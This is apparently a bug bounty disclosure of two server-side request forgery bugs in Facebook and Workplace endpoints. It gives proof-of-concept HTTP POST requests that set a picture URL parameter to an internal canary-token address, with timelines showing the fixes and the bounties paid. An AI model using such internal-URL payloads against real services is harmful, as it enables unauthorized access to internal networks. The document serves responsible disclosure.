Facebook SSRF - These aren't the access_tokens you're looking for

Facebook Server Side Request Forgery (SSRF)
The following could have given the ability to make arbitrary HTTP requests to servers within Facebook’s production network

Facebook SSRF via /me/personas

There exists a SSRF in the graph.facebook.com/me/personas endpoint

HTTP POST
/me/personas/
Host: graph.facebook.com
name=SomePersona
profile_picture_url=https://www.internalfb.com/intern/bug-bounty/get-canary-token/

Timeline

Oct 7, 2019 – Report sent
Oct 7, 2019 – Request to test with canary by Facebook
Oct 9, 2019 – Fixed by Facebook
Nov 7, 2019 – $30,000 bounty awarded by Facebook

Facebook SSRF via /ajax/groups/create_post/

There exists a SSRF in the /ajax/groups/create_post/ XController endpoint

HTTP POST
/ajax/groups/create_post/
Host: work-instance.workplace.com
name=SomeGroup
cover_photo_url=https://www.internalfb.com/intern/bug-bounty/get-canary-token/

Timeline

Mar 11, 2020 – Report sent
Mar 11, 2020 – Further investigation by Facebook
Mar 12, 2020 – Fixed by Facebook
Mar 18, 2020 – $30,000 bounty awarded by Facebook